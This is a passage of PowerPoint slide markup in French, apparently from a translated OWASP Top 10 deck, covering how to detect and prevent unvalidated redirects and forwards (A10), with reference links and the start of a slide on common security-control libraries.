              <a:t>La meilleure façon de détecter si une application possède  des redirections ou des renvois non validés est de :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Revoir le code source de tous les renvois ou les redirections (appelé transferts en .NET). Pour chaque utilisation, déterminer si l’URL de destination est inclue dans un paramètre de l’application. Si c’est le cas, il est nécessaire de s’assurer que les paramètres sont validés afin de contenir uniquement une destination autorisée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parcourir le site afin d’identifier si des redirections sont générées par l’application (codes 300-307 HTTP, notamment 302). Déterminer si les paramètres fournis utilisent une URL de destination.  Si c’est le cas, modifier l’URL cible et valider si la redirection est effectuée vers la nouvelle cible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Si le code source n’est pas disponible, vérifier si des paramètres sont utilisés dans le cadre d’une redirection ou d’un renvoi et, si c’est le cas, tester les.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6477000"/>
            <a:ext cx="3383280" cy="2667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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Article on Open Redirects </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6"/>
              </a:rPr>
              <a:t>ESAPI SecurityWrapperResponse sendRedirect() method</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId7"/>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8"/>
              </a:rPr>
              <a:t>CWE Entry 601 on Open Redirects </a:t>
            </a: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9"/>
              </a:rPr>
              <a:t>WASC Article on URL Redirector Abuse</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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Google blog article on the dangers of open redirects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Top 10 for .NET article on Unvalidated Redirects and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Forwards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3581400"/>
            <a:ext cx="3383280" cy="28194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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment s’en prémunir?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’utilisation de manière sûre de renvois et de redirections peut être effectuée de différentes façons:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eviter l’utilisation des redirections et des renvois.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En cas d’utilisation, ne pas utiliser de valeur de destination dans les paramètres utilisateur. Ceci est généralement réalisable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Si une valeur de destination doit être spécifiée, vérifier que la valeur est valide et autorisée pour l’utilisateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Il est recommandé de ne pas utiliser d’URL dans les paramètres, mais plutôt une valeur abstraite qui sera traduite côté serveur par une URL cible. Les applications peuvent utiliser ESAPI afin de bénéficier de la fonction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>sendRedirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> permettant de s’assurer que les redirections soient sûres.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’éradication de telles failles est extrêmement importante car elles sont principalement utilisées dans des attaques de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> afin de gagner la confiance des utilisateurs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Redirections et Renvois Non Validés</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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A10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="255109" y="1014596"/>
            <a:ext cx="6430019" cy="483012"/>
            <a:chOff x="255109" y="1014596"/>
            <a:chExt cx="6430019" cy="483012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="255109" y="1014596"/>
              <a:ext cx="6430019" cy="483012"/>
              <a:chOff x="255109" y="997424"/>
              <a:chExt cx="6430019" cy="483012"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       Vulnérabilités</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60"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1"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2"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2"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53"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en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Technique</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54"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0" idx="3"/>
                <a:endCxn id="53"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7" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="255109" y="1280701"/>
                <a:ext cx="615874" cy="199735"/>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Menaces</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58"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Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métier</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58"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1"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2" name="Rectangle 31"/>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716784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088124789"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="7997672"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>Mettez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> en oeuvre </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>bibliothèque</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>contrôles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>sécurité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>communs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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chemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>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US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>soyez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>débutant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>développement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sécurisé</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>d’applications</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> déjà </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>familier</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> avec les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>risques</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> qui y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>sont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>associés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>toujours</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>difficile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>créer</a:t>
                      </a:r>
                      <a:r>
